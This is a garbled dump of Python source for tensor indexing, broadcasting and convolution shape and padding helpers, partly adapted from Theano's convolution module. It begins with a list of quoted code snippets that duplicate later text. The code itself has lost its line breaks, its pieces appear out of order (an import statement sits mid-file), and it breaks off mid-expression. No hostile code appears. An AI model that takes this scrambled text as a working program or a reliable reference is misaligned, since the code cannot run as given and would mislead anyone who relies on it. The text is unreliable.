https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape:", "_get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape", "p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape", "# elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else:", "graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1", "s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in", "(2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the input image", "it must be 'valid' or 'full'. subsample: int. It must correspond to the", "pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h", "list)): # if len(pad_size) == 2: # pad_h = pad_size[0] * 2 #", "in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices +=", "len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for", "considered axis. dilation: int. It must correspond to the dilation on the considered", "if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}:", "+= 1 for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i)", "b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or", "output channels, number of input channels, height and width (and possibly depth) of", "must correspond respectively to: batch size, number of output channels, height and width", "start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx", "* 2 pad_w = padding[1] * 2 pad_top = (pad_h + 1) //", "convolution) elements must correspond respectively to : number of output channels, number of", "if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx", "an unshared 2D convolution, its six channels must correspond to : number of", "subsampling on height and width (and possibly depth) axis. filter_dilation: tuple of int.", "2D convolution) or five (for 3D convolution) elements must correspond respectively to :", "It must correspond to the subsampling on the considered axis. dilation: int. It", "def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices)", "only be 2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h", "it is a string, it must be 'valid' or 'full'. If it is", "subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern) + out_shp", "== 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size", "the subsampling on the considered axis. dilation: int. It must correspond to the", "1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset =", "len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1]", "= [] dst_indices = [] for s in data.shape: idx = pm.index(0, s-1)", "c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx", "depth) of the kernel. For an unshared 2D convolution, its six channels must", "channels, number of input channels, height and width (and possibly depth) of the", "image shape. Its four element must correspond respectively to: batch size, number of", "idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return", "on right. \"\"\" # pad_h = pad_w = padding * 2 pad_h =", "= pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx =", "= pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r", "idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim", "reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for d in", "= (pad_h + 1) // 2 # pad_left = (pad_w + 1) //", "idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a)", "and width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim =", "zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or a ==", "0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a)", "simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to", "return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute", "indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else:", "raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx,", "TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1)", "idx_offset = 1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset", "node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else:", "= a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if", "= () nz_indices = () shape_idx = () for i in range(n): out_shape", "in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif", "- 1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis):", "value cnt = 0 op1 = [] op2 = [] all_ops = []", "shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return", "height and width (and possibly depth) axis. filter_dilation: tuple of int. Its two", "in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node,", "!= node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0)", "1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def", "string or int. If it is a string, it must be 'valid' or", "padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right", "pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel,", "1) return idx def _dim_explicit(a_shp, dim): if dim is None: return dim if", "return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices =", "i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] =", "((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1,", "if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if", "kernel size Returns ------- pad_top : int Padding size on top pad_left :", "i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = []", "return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if", "If it is a tuple, its two (or three) elements respectively correspond to", "!= 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i]", "lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1:", "1) // 2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left,", "idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape)", "the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2", "else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2", "len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp =", "b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i", "= format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]:", "a_map[s] = sidx if s in node_b.shape: start = 0 if s in", "(pad_w + 1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w", "pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left,", "format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node", "Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to", "= tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample))", "data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 #", "+ p_bottom ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1],", "pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices", "= pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r =", "height and width (and possibly depth) of the image. None where undefined. kernel_shape:", "1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast", "where undefined. border_mode: string, or tuple of int. If it is a string,", "tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i", "return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a", "dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if", "assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s in", "[] for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx)", "of int Conv kernel size Returns ------- pad_top : int Padding size on", "= [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices):", "2D convolution, its six channels must correspond to : number of output channels,", "0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx =", "the output, number of input channels, height and width of the kernel. None", "= pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx,", "left pad_down : int Padding size on down. pad_right : int Padding size", "i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices", "format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert", ": int Padding size on left pad_down : int Padding size on down.", "batch size, number of input channels, height and width (and possibly depth) of", "possibly depth) axis. subsample: tuple of int. Its two or three elements respectively", "int Padding size on down. pad_right : int Padding size on right. \"\"\"", "3D convolution) elements must correspond respectively to : number of output channels, number", "considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1)", "for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,)", "= node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape:", "return dim if dim < 0: dim = len(a_shp) + dim return dim", "of input channels, height and width of the kernel. None where undefined. border_mode:", "correspond respectively to: batch size, number of output channels, height and width of", "== node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices", "p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data:", "idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations):", "rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = []", "idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"]", "idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP", "to the dilation on height and width axis. Returns ------- output_shape: tuple of", "pad_h = pad_w = padding * 2 pad_h = padding[0] * 2 pad_w", "= [] out_idx = [] nmap = {} reverse = True if not", "!= 1: out_shp = out_shp // subsample out_shp = out_shp + 1 return", "# TODO: Figure out what to do about multiple dimensions with the same", "start = 0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s,", "pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif", "of int. If it is a string, it must be 'valid' or 'full'.", "= b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for", "and width (and possibly depth) of the image. None where undefined. kernel_shape: tuple", "all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not", "# else: # raise ValueError(\"Size of padding can only be 2 or 4\")", "normal convolution, its four (for 2D convolution) or five (for 3D convolution) elements", "dst_indices = [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) #", "= [] b_idx = [] out_idx = [] nmap = {} reverse =", "to the output image shape. Its four element must correspond respectively to: batch", "1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] ==", "in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b,", "it is a string, it must be 'valid' or 'full'. subsample: int. It", "assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx def", "the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape -", "size on top pad_left : int Padding size on left pad_down : int", "corresponding to the kernel shape. For a normal convolution, its four (for 2D", "node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1)", "+ 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1", "zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\"", "node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value", "- 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),)", "assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i]", "padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size):", "padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0,", "(or five) element must correspond respectively to: batch size, number of input channels,", "data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple,", "or int. If it is a string, it must be 'valid' or 'full'.", "the considered axis. dilation: int. It must correspond to the dilation on the", "else: if not shape: shape = node.shape indices = tuple([pm.index(0, s - 1)", "ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes", "2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] #", "function compute the output shape of convolution operation. Copied and simplified from Theano", "b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}:", "\"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l", "must correspond respectively to : number of output channels, number of input channels,", "dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r = 0 else:", "Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1", "compute the output shape of convolution operation. Copied and simplified from Theano (2020/11/08):", "['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns ------- pad_top", "p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node,", "(data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape ==", "len(shape) src_indices = [] dst_indices = [] for s in data.shape: idx =", "out_shp // subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape,", "pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r", "in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape", "Returns ------- output_shape: tuple of int corresponding to the output image shape. Its", "the dilation on height and width axis. Returns ------- output_shape: tuple of int", "\\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1)", "output channels, height and width of the output, number of input channels, height", "node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap = {}", "not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None]", "= pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2],", "output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape])", "0 else: assert border_mode >= 0 pad_l = pad_r = border_mode # In", "i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] =", "{node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None):", "1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def", "0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc in", "axis. kernel_shape: int Corresponds to the kernel shape on a given axis. border_mode:", "five) element must correspond respectively to: batch size, number of input channels, height", "= a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1):", "subsampling on the considered axis. dilation: int. It must correspond to the dilation", "pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if", "axis. subsample: tuple of int. Its two or three elements respectively correspond to", "* pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape", "shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx =", "pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only be 2", "tuple of int. Its two or three elements correspond respectively to the dilation", "node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx)", "node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and", "idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx", "= dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r = 0", "return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx]", "= node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)):", "= 1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset +", "def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if", "op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt", "assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices =", "shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx", "!= tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure", "pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option", "---------- padding : int or str Padding size, or ['VALID', 'SAME'] kernel :", "def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the", "= {} reverse = True if not broadcastable: reverse = False a_idx =", "border_mode: string, or tuple of int. If it is a string, it must", "int corresponding to the output image shape on the considered axis. \"\"\" #", "output shape of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters", "= 0 op1 = [] op2 = [] all_ops = [] for i", "== pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx", "in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape", "nmap = {} reverse = True if not broadcastable: reverse = False a_idx", "= pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in", "out_idx.append(idx) if s in node_a.shape: start = 0 if s in a_map: start", "else: assert border_mode >= 0 pad_l = pad_r = border_mode # In case", "b == 1 or a == b: pass else: return False return True", "- 1) * dilation + 1 if border_mode == \"full\": pad_l = pad_r", "# if len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w", "width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape)", "# pad_left = (pad_w + 1) // 2 # return pad_top, pad_left, pad_h", "if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] =", "# assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 #", "int. It must correspond to the subsampling on the considered axis. dilation: int.", "pad_size * 2 # # pad_top = (pad_h + 1) // 2 #", "reverse = True if not broadcastable: reverse = False a_idx = [None] *", "else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for", "int. If it is a string, it must be 'valid' or 'full'. subsample:", "!= (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape:", "Padding size on right. \"\"\" # pad_h = pad_w = padding * 2", "padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert", "input image shape on a given axis. kernel_shape: int Corresponds to the kernel", "tuple of int. Its two or three elements respectively correspond to the subsampling", "output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if", "1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING", "pad_r != 0: out_shp += pad_r if subsample != 1: out_shp = out_shp", "= pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i]", "the output shape of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py", "pad_w = padding * 2 pad_h = padding[0] * 2 pad_w = padding[1]", "{padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0,", "= node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node", "= [] for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s)", "[] dst_indices = [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx)", "pad_w = padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left", "4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top", "tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return", "node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices", "-1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx)", "op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt", "dilation on the considered axis. Returns ------- out_shp: int corresponding to the output", "elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices,", "+= (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])]", "indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in", "idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def", "[] b_idx = [] out_idx = [] nmap = {} reverse = True", "of the output, number of input channels, height and width of the kernel.", "the input image shape. Its four (or five) element must correspond respectively to:", "or three elements correspond respectively to the dilation on height and width axis.", "if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape", "else: # raise ValueError(\"Size of padding can only be 2 or 4\") #", "of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) -", "np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s", "convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple):", "tuple([pm.index(0, s - 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2):", "idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx =", "channels, height and width of the kernel. None where undefined. border_mode: string, or", "reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape)", "padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\"", "operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of", "out_shp = out_shp // subsample out_shp = out_shp + 1 return out_shp def", "iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx,", "unshared 2D convolution, its six channels must correspond to : number of output", "subsample != 1: out_shp = out_shp // subsample out_shp = out_shp + 1", "of padding can only be 2 or 4\") # else: # assert isinstance(pad_size,", "the considered axis. Returns ------- out_shp: int corresponding to the output image shape", "respectively correspond to the padding on height and width (and possibly depth) axis.", "in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0,", "indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape", "node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return", "return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([])", "int corresponding to the input image shape. Its four (or five) element must", "pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert", "pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i]", "node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape ==", "!= 0: out_shp += pad_r if subsample != 1: out_shp = out_shp //", "Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the input", "nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1,", "width of the output, number of input channels, height and width of the", "- 1) out_idx.append(idx) if s in node_a.shape: start = 0 if s in", "and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the", "of input channels, height and width (and possibly depth) of the kernel. For", "(and possibly depth) axis. subsample: tuple of int. Its two or three elements", "nz_indices = () shape_idx = () for i in range(n): out_shape += ((var.shape[i]", "int Padding size on right. \"\"\" # pad_h = pad_w = padding *", "width (and possibly depth) axis. filter_dilation: tuple of int. Its two or three", "reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert", "kernel): \"\"\"Common code to get the pad option Parameters ---------- padding : int", "lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a", "return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([])", "to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx,", "= padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h +", "dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l !=", "range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i]", "== pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx", "import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return", "d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x,", "a given axis. border_mode: string or int. If it is a string, it", "assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 # #", "def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert", "out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute", "subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp", "channels, height and width of the output, number of input channels, height and", "tuple of int corresponding to the input image shape. Its four (or five)", ") for i in range(len(subsample)) ) else: out_shp = tuple( 